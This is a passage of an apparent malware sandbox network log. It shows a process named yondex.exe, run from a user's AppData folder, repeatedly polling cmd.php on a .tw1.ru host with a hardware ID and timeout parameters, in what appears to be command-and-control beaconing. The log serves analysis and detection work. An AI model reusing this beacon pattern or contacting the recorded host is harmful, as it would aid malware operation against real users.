Host: cv99160.tw1.ru
2024-06-23 09:32:27 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=2d0f1106b6ca1d93a95529839b44f669; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:32:27 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49793 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:28 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:28 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=c9baf6a40e24db881454ff78df6c891a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49794 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:29 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:32:29 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=3c9eac9dee9d1cbbbb42acb9e3f341f0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:32:29 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49795 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:30 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:32:31 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=fd0ed3b81222f557b87f597943955cad; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49796 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:31 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:32 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=31339c10b648383af7311c59deb9a0f0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49798 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:32 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:32:33 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=cf8033872ee23fcfea6f23485b5b62cf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:32:33 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49799 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:34 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:35 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=243316787c73f34e7d7462cf332a0468; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49800 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:36 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:37 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=b741f52c604f89f8a0e2aa8983a56ed9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49801 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:37 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:32:38 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=3fd7baf7c0efb5d81c715cd642575a03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:32:38 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49802 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:41 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:41 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=0de7b4e74749477eaef1ae868d5d8c41; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49803 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:42 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:32:42 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=e7e79891e207391a9a8386f06d0d1fc8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:32:42 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49804 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:44 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:44 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=0c1417d1fc22758d1a6f818c191f40b2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49805 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:45 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:32:45 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=2d7bc5049b7380bd87fda3310ad99abd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:32:45 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49806 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:32:46 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:32:46 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:32:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=8ceb206dc75dc8baca88513de103bf34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              65192.168.2.44980792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:32:47 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:48 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=24e4fde91affe7518ae9593da1d14ba6; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:48 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              66          192.168.2.4  49808        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:32:50 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:51 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8ab58a6e96d5060c1f88e1760283e456; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              67          192.168.2.4  49809        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:32:52 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:52 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2199943918ccab9b9225a000278e1093; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:52 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              68          192.168.2.4  49810        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:32:55 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:55 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6e26223efec701f05de49b581bf1c7ad; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              69          192.168.2.4  49811        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:32:56 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:32:56 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=7883bb3e1054918d511549afdc466b9e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:32:56 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              70          192.168.2.4  49812        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:32:59 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:32:59 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:32:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0f0d882731242f3c6d179aff9f82576c; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              71          192.168.2.4  49813        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:00 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:00 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8afc26dc924f8c0b5358d993127a81d9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:00 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              72          192.168.2.4  49814        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:02 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:02 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=03f34a72b3562e32974755aa7dd59028; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              73          192.168.2.4  49815        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:03 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:03 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aacb6779417c2cf709e014f0dcecea4e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:03 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              74          192.168.2.4  49816        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:05 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:05 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:05 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c3083dc6113ac723f23bb78d31ecc01a; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              75          192.168.2.4  49817        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:06 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:07 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=85fd0b84153e5f74614f2b9642535cb2; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:07 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              76          192.168.2.4  49818        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:08 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:08 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6ce9248e322e45b5baad9882989bb835; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              77          192.168.2.4  49819        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:09 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:09 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:09 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c259eaad96de6d792f192467ffb994f5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:09 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              78          192.168.2.4  49820        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:11 UTC  172                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:11 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=058b61a51c4f8b5a68e6eb220de6a117; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              79          192.168.2.4  49821        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:12 UTC  144                OUT        GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
